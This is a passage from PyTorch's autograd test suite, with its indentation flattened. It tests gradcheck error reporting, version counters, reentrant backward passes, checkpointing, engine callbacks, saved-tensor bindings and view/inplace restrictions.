self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when a runtime error is encountered while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
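# Run a small autograd program in a subprocess and check that the engine logs the
# torch.autograd.thread_shutdown API-usage event on exit.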
code = """import torch
from torch.autograd import Function
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
def test_checkpoint_valid_reset_on_error(self):
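# The failed autograd.grad() call below must not leave checkpointing in an invalid
# state: a subsequent checkpoint + backward() should still succeed.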
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
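# A callback queued from inside another execution-engine callback should still run
# as part of the same backward pass (both increments are observed).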
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
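# Install final callbacks at the requested reentrant depths (0 = outer backward of
# MyReentrantFunc, 1 = inner reentrant backward of MyFunc) and return how many
# times each one fired.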
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any of the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10::optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10::optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10::optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
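# Exercise the saved_tensors / _raw_saved_tensors bindings of a custom Function:
# None entries, hook registration errors, double registration, and access after
# the saved variables have been freed by backward().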
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
